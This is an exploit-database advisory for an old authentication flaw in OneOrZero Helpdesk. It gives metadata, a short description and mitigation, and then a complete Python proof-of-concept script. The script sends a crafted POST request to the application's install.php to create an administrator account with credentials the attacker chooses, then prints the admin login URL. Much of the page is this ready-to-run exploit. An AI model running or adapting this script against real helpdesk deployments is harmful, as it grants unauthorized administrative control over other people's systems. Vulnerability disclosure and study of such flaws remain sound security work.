OneOrZero Helpdesk Unauthorized Administrative Access

vendor:

Helpdesk

by:

SecurityFocus

4.3

CVSS

MEDIUM

Improper Authentication

287

CWE

Product Name: Helpdesk

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

OneOrZero Helpdesk Unauthorized Administrative Access

OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. The issue presents itself due to a programming error in a Helpdesk script. Reportedly a script does not sufficiently check if an instance of OneOrZero Helpdesk has already been installed. An attacker can exploit this issue by sending a specially crafted POST request to the vulnerable script, which will create an administrative account with the credentials specified in the request.

Mitigation:

Ensure that the application is configured to use strong authentication mechanisms and that all scripts are properly validated.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7611/info

OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access.

The issue presents itself due to a programming error in a Helpdesk script.
Reportedly a script does not sufficiently check if an instance of OneOrZero Helpdesk has already been installed.

import urlparse
import httplib
import string

OneOrZero("http://www.target.com","80","NewUserName","NewPassword")


class OneOrZero:
    def __init__(self,target,port,user,password):
        if port != "":
            self.port=str(port)
        else :
            self.port="80"
        self.path=str(urlparse.urlparse(target)[2])
        self.target=str(urlparse.urlparse(target)[1])
        self.user=str(user)
        self.password=str(password)
        self.USER_AGENT='OneOrZero.py'
        self.CreateAdminAccount()

    def CreateAdminAccount(self):


data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd'

        try :
            print "Connecting On "+self.target+"...\n"

            http=httplib.HTTP(self.target,self.port)

            print "Sending Data On "+self.target+"...\n"

            http.putrequest("POST",self.path+"/admin/install.php")

	    http.putheader("Content-Type","application/x-www-form-urlencoded")
            http.putheader("User-Agent",self.USER_AGENT)
            http.putheader("Host",self.target)
            http.putheader("Content-Length",str(len(data)))
            http.endheaders()

            http.send(data)

            code,msg,headers = http.getreply()

            print "HTTP Code : ",str(code)
            print "HTTP Connection : ",msg
            print "HTTP headers : \n",headers,"\n"

            file=http.getfile()
            if string.find(file.read(),"Administrator Account Created Successfully.") != -1:
                print "Congratulations, Administrator Account Created Successfully."
                print "You Can Log In Here : http://"+self.target+self.path+"/admin/control.php"
                print "User : ",self.user
                print "Password : ",self.password
            else :
                print "Administrator Account Hasn't Been Created."

        except :
            print "Error During Admin Account Creation."